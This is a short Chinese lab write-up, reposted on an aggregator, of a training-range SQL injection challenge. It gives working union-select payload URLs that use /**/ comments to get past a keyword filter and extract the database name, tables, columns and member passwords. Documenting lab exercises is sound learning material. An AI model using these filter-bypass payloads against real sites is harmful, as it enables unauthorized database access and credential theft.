墨者靶场-SQL过滤字符后手工注入漏洞测试(第1题)

其他 2020-03-19 17:35:16 阅读次数: 0

                                                  墨者学习

                                                 By/shy014

  1. 进去首页又看到熟悉的公告

  1. 通过简单的测试,确定存在sql注入漏洞,但是输入and 1=1 ,and 1=2,order by,union select ,and都没有反应。

  1. 经过尝试,用/**/代替空格,然后将URL进行URL编码就可以绕过
  2. 确定有4个字段

5,确定回显位置

  1. 确定当前数据库和用户

http://219.153.49.228:46365/new_list.php?id=2/**/union/**/select/**/1,database(),user(),4#

6,确定当前数据库中的表名(库名要用hex编码 直接使用database()我没成功)

http://219.153.49.228:46365/new_list.php?id=2/**/union/**/select/**/1,group_concat(table_name),version(),4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x6d6f7a68655f64697363757a5f73746f726d67726f7570

7,确定表中的字段名

http://219.153.49.228:46365/new_list.php?id=2/**/union/**/select/**/1,group_concat(column_name),version(),4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/0x73746f726d67726f75705f6d656d626572

8,确定字段的值

http://219.153.49.228:46365/new_list.php

?id=2/**/union/**/select/**/1,group_concat(id,name,password),version(),4/**/from/**/stormgroup_member

9.破解MD5 登陆获得key

shy014
发布了41 篇原创文章 · 获赞 5 · 访问量 1万+
私信 关注

猜你喜欢

转载自blog.csdn.net/qq_32393893/article/details/103080495
今日推荐
周排行
成为C++高手之宏与枚举
在CAD二次开发中使用进度条
Js插件ECharts,HighCharts学习网址整理
Celery提交任务出错(on windows.)
cephfs内核客户端性能追踪
thinkphp中PHPExcel用法
EntityFramework动态组合多排序字段
汇编语言(八)实验9 根据材料编程
安装ubuntu后必须做的事情(对我而言)
JS函数式编程
每日归档
更多
2024-10-22(0)
2024-10-21(0)
2024-10-20(0)
2024-10-19(0)
2024-10-18(0)
2024-10-17(0)
2024-10-16(0)
2024-10-15(0)
2024-10-14(0)
2024-10-13(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022